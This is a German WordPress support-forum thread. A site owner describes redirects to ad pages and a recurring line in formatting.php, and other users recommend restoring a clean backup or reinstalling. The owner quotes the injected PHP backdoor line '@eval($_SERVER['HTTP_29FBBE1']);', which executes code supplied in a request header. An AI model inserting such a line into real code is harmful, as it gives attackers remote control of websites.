Support » Allgemeine Fragen » Formatting.PHP mit Malware Code @eval

  • Hallo und guten Tag,

    ich habe seit einigen Tagen mit ungewollten Umleitungen auf Werbe-Seiten zu kämpfen. Es scheint sich Malware breit gemacht zu haben. Aktuelles Problem ist das

    ind der formatting.php in Zeile 318 folgender Code ist

    @eval($_SERVER['HTTP_29FBBE1']);

    Es ist aber egal ob ich diesen entfernen oder die Datei mit einer Originalen formatting.php überschreibe nach 10 sekunden ist der Code wieder da.

Ansicht von 8 Antworten - 1 bis 8 (von insgesamt 8)
  • Meistens hinterlassen die Angreifer Hintertürchen (Backdoors), um sich jederzeit wieder Zutritt verschaffen zu können. Eine manuelle Bereinigung ist deshalb aufwendig. Einfacher ist es, ein unkomprimittiertes Backup wiederherzustellen. Wenn du selber keines erstellt hast, frag beim Support deines Webhosters nach.

    Informationen zu gehackten Websites findest du in der FAQ:

    Seite gehacked, was tun?

    Thread-Starter maestro2k5

    (@maestro2k5)

    Danke für den Hinweis. Habe schon seit Tagen probiert alle Passwörter geändert, alles aktualisiert. Nutze nur 1 Plugin das ist auch aktuell. 2 Admin Accounts die noch vorhanden waren wurden auch gelöscht. Dennoch ist immernoch die Weiterleitung der Indexseite auf einen Werbe-Anbieter. Alle andern Seiten weisen das Problem nicht auf. Daher dachte ich an eine schnelle Lösung ohne Backup.

    Daher dachte ich an eine schnelle Lösung ohne Backup.

    Eine schnelle Lösung gibt es in solchen Fällen leider nicht. Nur ein unkomprimittiertes Backup oder eine Neuinstallation sind im Endeffekt der sichere Weg.

    Thread-Starter maestro2k5

    (@maestro2k5)

    Danke, dann werde ich mich an eine Neuinstallation machen.

    Hm, Neuinstallation ist jenachdem was vorher schon an Arbeit reingesteckt wurde, vielleicht ein wenig übertrieben (wenn auch die sauberste Lösung). Ansonsten musst du die Dateien vom WordPress-Core, Plugins und Themes auf dem Server löschen und durch neu heruntergeladene Dateien ersetzen.

    Wie @bscu schon schrieb, werden (vor allem in wp-content) gerne weitere Malware-Skripte platziert, die dann so unauffällige Namen wie default.php oder settings.php bekommen. Die Dateien musst du alle einzeln durchsehen, was dann tatsächlich mühsam ist.

    Wenn die Frage für dich beantwortet wurde, sei bitte noch so nett und markiere den Thread als „gelöst“.

    Thread-Starter maestro2k5

    (@maestro2k5)

    Hallo, habe die Neuinstallation gemacht lief auch alles soweit gut aber der Code in dieser einen Datei ist wieder da. Aber die Seite läuft problemlos.

    Noch. 😛

    Thread-Starter maestro2k5

    (@maestro2k5)

    Einfach nur nervig sowas.

Ansicht von 8 Antworten - 1 bis 8 (von insgesamt 8)
  • Das Thema „Formatting.PHP mit Malware Code @eval“ ist für neue Antworten geschlossen.